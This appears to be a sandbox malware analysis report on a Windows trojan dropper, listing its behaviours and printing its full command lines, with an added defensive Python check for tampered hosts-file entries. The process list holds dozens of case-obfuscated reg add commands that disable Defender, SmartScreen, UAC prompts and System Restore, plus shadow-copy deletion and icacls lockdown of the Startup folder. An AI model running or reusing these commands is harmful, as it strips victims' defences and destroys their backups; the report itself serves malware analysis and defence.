Analysis Overview
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
Threat Level: Known bad
The file Trojan.Win32.DelShad.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender notification settings
Windows security bypass
UAC bypass
Deletes shadow copies
Disables use of System Restore points
Sets file to hidden
Drops file in Drivers directory
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Executes dropped EXE
Checks BIOS information in registry
Modifies file permissions
Checks computer location settings
Looks up external IP address via web service
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Views/modifies file attributes
Kills process with taskkill
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
cURL User-Agent
Interacts with shadow copies
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 23:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win11-20241007-en
Max time kernel
150s
Max time network
135s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass (sandbox label; the three values below make UAC elevate administrators without prompting, auto-deny standard users and skip the secure desktop rather than bypass UAC, and writing them under HKLM already requires an elevated token)
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory (sandbox label; the file opened is the hosts file under drivers\etc, not a driver)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
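Added example, not part of the sandbox output: the nineteen `find /c /i "<host>" "C:\Windows\system32\drivers\etc\hosts"` invocations in the process list probe whether SmartScreen, URS, Safe Browsing and Windows Update hostnames are already pinned in the hosts file, and the row above shows cmd.exe opening that file for modification. The report does not show what was written, so the check below is the one a responder runs on the host afterwards: parse the hosts file and report any of those names that resolve locally. The hostname list is copied from the find.exe command lines in this report; the hosts file content is constructed for the example.

```python
import re

# The 19 hostnames the sample probes with find.exe, copied from this report.
PROBED_HOSTS = frozenset({
    "checkappexec.microsoft.com",
    "smartscreen-prod.microsoft.com",
    "nav.smartscreen.microsoft.com",
    "nf.smartscreen.microsoft.com",
    "safebrowsing.googleapis.com",
    "ars.smartscreen.microsoft.com",
    "apprep.smartscreen.microsoft.com",
    "c.urs.microsoft.com",
    "feedback.smartscreen.microsoft.com",
    "ping.nav.smartscreen.microsoft.com",
    "ping.nf.smartscreen.microsoft.com",
    "t.nav.smartscreen.microsoft.com",
    "t.nf.smartscreen.microsoft.com",
    "t.urs.microsoft.com",
    "unitedstates.smartscreen.microsoft.com",
    "unitedstates.smartscreen-prod.microsoft.com",
    "urs.microsoft.com",
    "urs.smartscreen.microsoft.com",
    "slscr.update.microsoft.com",
})


def parse_hosts(text):
    """Yield (address, hostname) for every active mapping in a hosts file.

    Comments (# ...) and blank lines are skipped, and one line may map
    several names to the same address, as hosts(5) syntax allows.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) < 2:
            continue
        addr = parts[0]
        for name in parts[1:]:
            yield addr, name.lower().rstrip(".")


def find_sinkholed(text, watchlist=PROBED_HOSTS):
    """Return {hostname: address} for watch-listed names the hosts file resolves.

    Any address counts: 0.0.0.0 or 127.0.0.1 black-holes the reputation
    service, while a routable address would hand the lookups to another host.
    None of these names has a legitimate reason to be pinned in hosts.
    """
    return {name: addr for addr, name in parse_hosts(text) if name in watchlist}


# Constructed sample hosts file, not taken from the sandbox run.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0 smartscreen-prod.microsoft.com
0.0.0.0 safebrowsing.googleapis.com   # appended by the dropper
0.0.0.0 nav.smartscreen.microsoft.com nf.smartscreen.microsoft.com
"""

if __name__ == "__main__":
    # On a live host read %SystemRoot%\System32\drivers\etc\hosts instead.
    for host, addr in sorted(find_sinkholed(SAMPLE_HOSTS).items()):
        print(f"{host} -> {addr}")
```

`find /c /i` only prints a match count, so the probes themselves are harmless; they matter because they precede the hosts modification recorded above and name exactly the endpoints SmartScreen, Edge and Chrome use for reputation lookups. A clean Windows hosts file contains only commented-out localhost lines, so any hit from this check is a finding.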
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5064 set thread context of 3788 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp" /SL5="$D023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp" /SL5="$E023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
